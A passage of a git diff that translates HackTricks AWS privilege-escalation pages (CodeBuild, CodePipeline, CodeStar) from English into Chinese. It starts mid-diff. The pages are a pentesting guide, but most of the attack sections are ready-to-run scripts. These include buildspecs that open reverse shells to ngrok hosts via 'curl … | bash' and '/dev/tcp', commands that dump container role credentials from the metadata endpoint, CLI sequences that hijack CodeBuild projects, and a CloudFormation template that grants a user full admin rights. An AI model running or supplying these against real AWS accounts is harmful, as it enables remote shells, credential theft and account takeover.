\"BUILD_GENERAL1_SMALL\" - }, - \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" +\"name\": \"codebuild-demo-project\", +\"source\": { +\"type\": \"NO_SOURCE\", +\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" +}, +\"artifacts\": { +\"type\": \"NO_ARTIFACTS\" +}, +\"environment\": { +\"type\": \"LINUX_CONTAINER\", +\"image\": \"aws/codebuild/standard:1.0\", +\"computeType\": \"BUILD_GENERAL1_SMALL\" +}, +\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" }" @@ -117,19 +112,17 @@ aws codebuild start-build --project-name codebuild-demo-project # Delete the project aws codebuild delete-project --name codebuild-demo-project ``` - {{#endtab }} -{{#tab name="Example2" }} - +{{#tab name="示例2" }} ```bash # Generated by AI, not tested # Create a buildspec.yml file with reverse shell command echo 'version: 0.2 phases: - build: - commands: - - curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml +build: +commands: +- curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml # Upload the buildspec to the bucket and give access to everyone aws s3 cp buildspec.yml s3:/buildspec.yml @@ -141,25 +134,23 @@ aws codebuild create-project --name reverse-shell-project --source type=S3,locat aws codebuild start-build --project-name reverse-shell-project ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Direct privesc to any AWS Codebuild role. +**潜在影响:** 直接提升到任何 AWS Codebuild 角色。 > [!WARNING] -> In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**. +> 在 **Codebuild 容器** 中,文件 `/codebuild/output/tmp/env.sh` 包含访问 **元数据凭证** 所需的所有环境变量。 -> This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` +> 该文件包含 **环境变量 `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`**,其中包含访问凭证的 **URL 路径**。它将类似于 `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` -> Add that to the URL **`http://169.254.170.2/`** and you will be able to dump the role credentials. +> 将其添加到 URL **`http://169.254.170.2/`**,您将能够转储角色凭证。 -> Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**. +> 此外,它还包含 **环境变量 `ECS_CONTAINER_METADATA_URI`**,其中包含获取 **容器元数据** 的完整 URL。 -### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) - -Just like in the previous section, if instead of creating a build project you can modify it, you can indicate the IAM Role and steal the token +### `iam:PassRole`,`codebuild:UpdateProject`,(`codebuild:StartBuild` | `codebuild:StartBuildBatch`) +就像在前一节中一样,如果您可以修改而不是创建构建项目,您可以指示 IAM 角色并窃取令牌。 ```bash REV_PATH="/tmp/codebuild_pwn.json" @@ -171,20 +162,20 @@ REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash" # You need to indicate the name of the project you want to modify JSON="{ - \"name\": \"\", - \"source\": { - \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" - }, - \"artifacts\": { - \"type\": \"NO_ARTIFACTS\" - }, - \"environment\": { - \"type\": \"LINUX_CONTAINER\", - \"image\": \"aws/codebuild/standard:1.0\", - \"computeType\": \"BUILD_GENERAL1_SMALL\" - }, - \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" +\"name\": \"\", +\"source\": { +\"type\": \"NO_SOURCE\", +\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" +}, +\"artifacts\": { +\"type\": \"NO_ARTIFACTS\" +}, +\"environment\": { +\"type\": \"LINUX_CONTAINER\", +\"image\": \"aws/codebuild/standard:1.0\", +\"computeType\": \"BUILD_GENERAL1_SMALL\" +}, +\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" }" printf "$JSON" > $REV_PATH @@ -193,16 +184,14 @@ aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build --project-name codebuild-demo-project ``` - -**Potential Impact:** Direct privesc to any AWS Codebuild role. +**潜在影响:** 直接提升到任何 AWS Codebuild 角色。 ### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) -Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**. +与前一节相似,但**没有 `iam:PassRole` 权限**,您可以利用这些权限**修改现有的 Codebuild 项目并访问它们已经分配的角色**。 {{#tabs }} {{#tab name="StartBuild" }} - ```sh REV_PATH="/tmp/codebuild_pwn.json" @@ -213,20 +202,20 @@ REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATI REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" JSON="{ - \"name\": \"\", - \"source\": { - \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" - }, - \"artifacts\": { - \"type\": \"NO_ARTIFACTS\" - }, - \"environment\": { - \"type\": \"LINUX_CONTAINER\", - \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", - \"computeType\": \"BUILD_GENERAL1_SMALL\", - \"imagePullCredentialsType\": \"CODEBUILD\" - } +\"name\": \"\", +\"source\": { +\"type\": \"NO_SOURCE\", +\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" +}, +\"artifacts\": { +\"type\": \"NO_ARTIFACTS\" +}, +\"environment\": { +\"type\": \"LINUX_CONTAINER\", +\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", +\"computeType\": \"BUILD_GENERAL1_SMALL\", +\"imagePullCredentialsType\": \"CODEBUILD\" +} }" # Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild! @@ -237,11 +226,9 @@ aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build --project-name codebuild-demo-project ``` - {{#endtab }} {{#tab name="StartBuildBatch" }} - ```sh REV_PATH="/tmp/codebuild_pwn.json" @@ -250,20 +237,20 @@ REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" # You need to indicate the name of the project you want to modify JSON="{ - \"name\": \"project_name\", - \"source\": { - \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\" - }, - \"artifacts\": { - \"type\": \"NO_ARTIFACTS\" - }, - \"environment\": { - \"type\": \"LINUX_CONTAINER\", - \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", - \"computeType\": \"BUILD_GENERAL1_SMALL\", - \"imagePullCredentialsType\": \"CODEBUILD\" - } +\"name\": \"project_name\", +\"source\": { +\"type\": \"NO_SOURCE\", +\"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\" +}, +\"artifacts\": { +\"type\": \"NO_ARTIFACTS\" +}, +\"environment\": { +\"type\": \"LINUX_CONTAINER\", +\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", +\"computeType\": \"BUILD_GENERAL1_SMALL\", +\"imagePullCredentialsType\": \"CODEBUILD\" +} }" printf "$JSON" > $REV_PATH @@ -274,41 +261,37 @@ aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build-batch --project-name codebuild-demo-project ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Direct privesc to attached AWS Codebuild roles. +**潜在影响:** 直接提升到附加的 AWS Codebuild 角色。 ### SSM -Having **enough permissions to start a ssm session** it's possible to get **inside a Codebuild project** being built. +拥有 **足够的权限来启动 ssm 会话**,可以进入 **正在构建的 Codebuild 项目**。 -The codebuild project will need to have a breakpoint: +Codebuild 项目需要有一个断点:
phases:
-  pre_build:
-    commands:
-      - echo Entered the pre_build phase...
-      - echo "Hello World" > /tmp/hello-world
+pre_build:
+commands:
+- echo Entered the pre_build phase...
+- echo "Hello World" > /tmp/hello-world
       - codebuild-breakpoint
 
-And then: - +然后: ```bash aws codebuild batch-get-builds --ids --region --output json aws ssm start-session --target --region ``` - -For more info [**check the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html). +For more info [**查看文档**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html). ### (`codebuild:StartBuild` | `codebuild:StartBuildBatch`), `s3:GetObject`, `s3:PutObject` -An attacker able to start/restart a build of a specific CodeBuild project which stores its `buildspec.yml` file on an S3 bucket the attacker has write access to, can obtain command execution in the CodeBuild process. - -Note: the escalation is relevant only if the CodeBuild worker has a different role, hopefully more privileged, than the one of the attacker. +能够启动/重启特定 CodeBuild 项目的构建的攻击者,如果该项目的 `buildspec.yml` 文件存储在攻击者具有写入权限的 S3 存储桶中,则可以在 CodeBuild 过程中获得命令执行。 +注意:只有当 CodeBuild 工作人员的角色与攻击者的角色不同时,升级才是相关的,理想情况下,工作人员的角色具有更高的权限。 ```bash aws s3 cp s3:///buildspec.yml ./ @@ -325,29 +308,22 @@ aws codebuild start-build --project-name # Wait for the reverse shell :) ``` - -You can use something like this **buildspec** to get a **reverse shell**: - +您可以使用类似这样的 **buildspec** 来获取 **reverse shell**: ```yaml:buildspec.yml version: 0.2 phases: - build: - commands: - - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1 +build: +commands: +- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1 ``` - -**Impact:** Direct privesc to the role used by the AWS CodeBuild worker that usually has high privileges. +**影响:** 直接提升到 AWS CodeBuild 工作人员使用的角色,该角色通常具有高权限。 > [!WARNING] -> Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload +> 请注意,buildspec 可能以 zip 格式预期,因此攻击者需要下载、解压、修改根目录中的 `buildspec.yml`,然后重新压缩并上传。 -More details could be found [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/). +更多详细信息可以在 [这里](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/) 找到。 -**Potential Impact:** Direct privesc to attached AWS Codebuild roles. +**潜在影响:** 直接提升到附加的 AWS Codebuild 角色。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md index 0662ae9e2..c8c2c123c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md @@ -4,7 +4,7 @@ ## codepipeline -For more info about codepipeline check: +有关 codepipeline 的更多信息,请查看: {{#ref}} ../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md @@ -12,13 +12,13 @@ For more info about codepipeline check: ### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution` -When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them. +在创建代码管道时,您可以指示一个 **codepipeline IAM 角色来运行**,因此您可以妥协它们。 -Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...) +除了之前的权限,您还需要 **访问存储代码的位置**(S3、ECR、github、bitbucket...) -I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:` +我通过在网页上进行该过程进行了测试,之前提到的权限不是创建代码管道所需的 List/Get 权限,但要在网页上创建它,您还需要:`codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:` -During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise: +在 **创建构建项目** 时,您可以指示一个 **要运行的命令**(rev shell?)并以 **特权用户** 运行构建阶段,这就是攻击者需要妥协的配置: ![](<../../../images/image (276).png>) @@ -26,16 +26,12 @@ During the **creation of the build project** you can indicate a **command to run ### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution` -It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions. +可能可以使用之前的权限修改所使用的角色和在代码管道上执行的命令。 ### `codepipeline:pollforjobs` -[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html): +[AWS 提到](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html): -> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. This API also **returns any secret values defined for the action**. +> 当调用此 API 时,CodePipeline **返回用于存储管道工件的 S3 存储桶的临时凭证**,如果该操作需要访问该 S3 存储桶以获取输入或输出工件。此 API 还 **返回为该操作定义的任何秘密值**。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md index 387c6ffff..f461741ea 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md @@ -4,7 +4,7 @@ ## Codestar -You can find more information about codestar in: +您可以在以下位置找到有关codestar的更多信息: {{#ref}} codestar-createproject-codestar-associateteammember.md @@ -12,7 +12,7 @@ codestar-createproject-codestar-associateteammember.md ### `iam:PassRole`, `codestar:CreateProject` -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page: +通过这些权限,您可以**滥用codestar IAM角色**通过**cloudformation模板**执行**任意操作**。请查看以下页面: {{#ref}} iam-passrole-codestar-createproject.md @@ -20,14 +20,13 @@ iam-passrole-codestar-createproject.md ### `codestar:CreateProject`, `codestar:AssociateTeamMember` -This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**. - +此技术使用`codestar:CreateProject`创建一个codestar项目,并使用`codestar:AssociateTeamMember`使IAM用户成为新CodeStar**项目**的**所有者**,这将授予他们**带有一些额外权限的新策略**。 ```bash PROJECT_NAME="supercodestar" aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME +--name $PROJECT_NAME \ +--id $PROJECT_NAME echo "Waiting 1min to start the project" sleep 60 @@ -35,15 +34,14 @@ sleep 60 USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"') aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \ - --project-id $PROJECT_NAME \ - --user-arn "$USER_ARN" \ - --project-role "Owner" \ - --remote-access-allowed +--project-id $PROJECT_NAME \ +--user-arn "$USER_ARN" \ +--project-role "Owner" \ +--remote-access-allowed ``` +如果您已经是**项目的成员**,您可以使用权限**`codestar:UpdateTeamMember`**将**您的角色**更新为所有者,而不是`codestar:AssociateTeamMember`。 -If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember` - -**Potential Impact:** Privesc to the codestar policy generated. You can find an example of that policy in: +**潜在影响:** 提升到生成的codestar策略。您可以在以下位置找到该策略的示例: {{#ref}} codestar-createproject-codestar-associateteammember.md @@ -51,27 +49,23 @@ codestar-createproject-codestar-associateteammember.md ### `codestar:CreateProjectFromTemplate` -1. **Create a New Project:** - - Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project. - - Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**. - - This access specifically targets a stack associated with the `CodeStarWorker--CloudFormation` IAM role. -2. **Update the Target Stack:** - - With the granted CloudFormation permissions, proceed to update the specified stack. - - The stack's name will typically conform to one of two patterns: - - `awscodestar--infrastructure` - - `awscodestar--lambda` - - The exact name depends on the chosen template (referencing the example exploit script). -3. **Access and Permissions:** - - Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack. - - Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further. +1. **创建新项目:** +- 利用**`codestar:CreateProjectFromTemplate`**操作来启动新项目的创建。 +- 成功创建后,自动授予**`cloudformation:UpdateStack`**的访问权限。 +- 此访问权限专门针对与`CodeStarWorker--CloudFormation` IAM角色相关联的堆栈。 +2. **更新目标堆栈:** +- 使用授予的CloudFormation权限,继续更新指定的堆栈。 +- 堆栈的名称通常符合以下两种模式之一: +- `awscodestar--infrastructure` +- `awscodestar--lambda` +- 确切名称取决于所选模板(参考示例利用脚本)。 +3. **访问和权限:** +- 更新后,您获得与堆栈关联的**CloudFormation IAM角色**分配的能力。 +- 注意:这并不固有地提供完全的管理员权限。可能需要环境中其他配置错误的资源来进一步提升权限。 -For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\ -You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py) +有关更多信息,请查看原始研究:[https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/)。\ +您可以在[https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py)找到利用代码。 -**Potential Impact:** Privesc to cloudformation IAM role. +**潜在影响:** 提升到cloudformation IAM角色。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md index 0de95738e..d1c003bbf 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md @@ -2,84 +2,78 @@ {{#include ../../../../banners/hacktricks-training.md}} -This is the created policy the user can privesc to (the project name was `supercodestar`): - +这是用户可以提升权限的创建策略(项目名称为 `supercodestar`): ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "1", - "Effect": "Allow", - "Action": ["codestar:*", "iam:GetPolicy*", "iam:ListPolicyVersions"], - "Resource": [ - "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar", - "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent", - "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner" - ] - }, - { - "Sid": "2", - "Effect": "Allow", - "Action": [ - "codestar:DescribeUserProfile", - "codestar:ListProjects", - "codestar:ListUserProfiles", - "codestar:VerifyServiceRole", - "cloud9:DescribeEnvironment*", - "cloud9:ValidateEnvironmentName", - "cloudwatch:DescribeAlarms", - "cloudwatch:GetMetricStatistics", - "cloudwatch:ListMetrics", - "codedeploy:BatchGet*", - "codedeploy:List*", - "codestar-connections:UseConnection", - "ec2:DescribeInstanceTypeOfferings", - "ec2:DescribeInternetGateways", - "ec2:DescribeNatGateways", - "ec2:DescribeRouteTables", - "ec2:DescribeSecurityGroups", - "ec2:DescribeSubnets", - "ec2:DescribeVpcs", - "events:ListRuleNamesByTarget", - "iam:GetAccountSummary", - "iam:GetUser", - "iam:ListAccountAliases", - "iam:ListRoles", - "iam:ListUsers", - "lambda:List*", - "sns:List*" - ], - "Resource": ["*"] - }, - { - "Sid": "3", - "Effect": "Allow", - "Action": [ - "codestar:*UserProfile", - "iam:GenerateCredentialReport", - "iam:GenerateServiceLastAccessedDetails", - "iam:CreateAccessKey", - "iam:UpdateAccessKey", - "iam:DeleteAccessKey", - "iam:UpdateSSHPublicKey", - "iam:UploadSSHPublicKey", - "iam:DeleteSSHPublicKey", - "iam:CreateServiceSpecificCredential", - "iam:UpdateServiceSpecificCredential", - "iam:DeleteServiceSpecificCredential", - "iam:ResetServiceSpecificCredential", - "iam:Get*", - "iam:List*" - ], - "Resource": ["arn:aws:iam::947247140022:user/${aws:username}"] - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "1", +"Effect": "Allow", +"Action": ["codestar:*", "iam:GetPolicy*", "iam:ListPolicyVersions"], +"Resource": [ +"arn:aws:codestar:eu-west-1:947247140022:project/supercodestar", +"arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent", +"arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner" +] +}, +{ +"Sid": "2", +"Effect": "Allow", +"Action": [ +"codestar:DescribeUserProfile", +"codestar:ListProjects", +"codestar:ListUserProfiles", +"codestar:VerifyServiceRole", +"cloud9:DescribeEnvironment*", +"cloud9:ValidateEnvironmentName", +"cloudwatch:DescribeAlarms", +"cloudwatch:GetMetricStatistics", +"cloudwatch:ListMetrics", +"codedeploy:BatchGet*", +"codedeploy:List*", +"codestar-connections:UseConnection", +"ec2:DescribeInstanceTypeOfferings", +"ec2:DescribeInternetGateways", +"ec2:DescribeNatGateways", +"ec2:DescribeRouteTables", +"ec2:DescribeSecurityGroups", +"ec2:DescribeSubnets", +"ec2:DescribeVpcs", +"events:ListRuleNamesByTarget", +"iam:GetAccountSummary", +"iam:GetUser", +"iam:ListAccountAliases", +"iam:ListRoles", +"iam:ListUsers", +"lambda:List*", +"sns:List*" +], +"Resource": ["*"] +}, +{ +"Sid": "3", +"Effect": "Allow", +"Action": [ +"codestar:*UserProfile", +"iam:GenerateCredentialReport", +"iam:GenerateServiceLastAccessedDetails", +"iam:CreateAccessKey", +"iam:UpdateAccessKey", +"iam:DeleteAccessKey", +"iam:UpdateSSHPublicKey", +"iam:UploadSSHPublicKey", +"iam:DeleteSSHPublicKey", +"iam:CreateServiceSpecificCredential", +"iam:UpdateServiceSpecificCredential", +"iam:DeleteServiceSpecificCredential", +"iam:ResetServiceSpecificCredential", +"iam:Get*", +"iam:List*" +], +"Resource": ["arn:aws:iam::947247140022:user/${aws:username}"] +} +] } ``` - {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md index 891d72df5..b418f1d8c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md @@ -2,42 +2,39 @@ {{#include ../../../../banners/hacktricks-training.md}} -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. - -To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**: +通过这些权限,您可以**滥用 codestar IAM 角色**来通过**cloudformation 模板**执行**任意操作**。 +要利用这一点,您需要创建一个**可以从被攻击账户访问的 S3 存储桶**。上传一个名为 `toolchain.json` 的文件。该文件应包含**cloudformation 模板漏洞**。以下内容可用于将托管策略设置为您控制的用户,并**授予其管理员权限**: ```json:toolchain.json { - "Resources": { - "supercodestar": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "ManagedPolicyName": "CodeStar_supercodestar", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "*", - "Resource": "*" - } - ] - }, - "Users": [""] - } - } - } +"Resources": { +"supercodestar": { +"Type": "AWS::IAM::ManagedPolicy", +"Properties": { +"ManagedPolicyName": "CodeStar_supercodestar", +"PolicyDocument": { +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": "*", +"Resource": "*" +} +] +}, +"Users": [""] +} +} +} } ``` - -Also **upload** this `empty zip` file to the **bucket**: +也**上传**这个 `empty zip` 文件到 **bucket**: {% file src="../../../../images/empty.zip" %} -Remember that the **bucket with both files must be accessible by the victim account**. - -With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project: +请记住,**包含这两个文件的 bucket 必须可以被受害者账户访问**。 +上传完这两样东西后,您现在可以继续进行 **exploitation** 创建一个 **codestar** 项目: ```bash PROJECT_NAME="supercodestar" @@ -45,19 +42,19 @@ PROJECT_NAME="supercodestar" ## In this JSON the bucket and key (path) to the empry.zip file is used SOURCE_CODE_PATH="/tmp/surce_code.json" SOURCE_CODE="[ - { - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"empty.zip\" - } - }, - \"destination\": { - \"codeCommit\": { - \"name\": \"$PROJECT_NAME\" - } - } - } +{ +\"source\": { +\"s3\": { +\"bucketName\": \"privesc\", +\"bucketKey\": \"empty.zip\" +} +}, +\"destination\": { +\"codeCommit\": { +\"name\": \"$PROJECT_NAME\" +} +} +} ]" printf "$SOURCE_CODE" > $SOURCE_CODE_PATH @@ -65,28 +62,23 @@ printf "$SOURCE_CODE" > $SOURCE_CODE_PATH ## In this JSON the bucket and key (path) to the toolchain.json file is used TOOLCHAIN_PATH="/tmp/tool_chain.json" TOOLCHAIN="{ - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"toolchain.json\" - } - }, - \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" +\"source\": { +\"s3\": { +\"bucketName\": \"privesc\", +\"bucketKey\": \"toolchain.json\" +} +}, +\"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" }" printf "$TOOLCHAIN" > $TOOLCHAIN_PATH # Create the codestar project that will use the cloudformation epxloit to privesc aws codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME \ - --source-code file://$SOURCE_CODE_PATH \ - --toolchain file://$TOOLCHAIN_PATH +--name $PROJECT_NAME \ +--id $PROJECT_NAME \ +--source-code file://$SOURCE_CODE_PATH \ +--toolchain file://$TOOLCHAIN_PATH ``` - -This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user. +此漏洞基于**这些权限的Pacu漏洞**:[https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) 在这里你可以找到为角色创建管理员管理策略的变体,而不是为用户创建。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md index ddd0c1efd..ba2977e3e 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md @@ -4,28 +4,27 @@ ## Cognito -For more info about Cognito check: +有关Cognito的更多信息,请查看: {{#ref}} ../aws-services/aws-cognito-enum/ 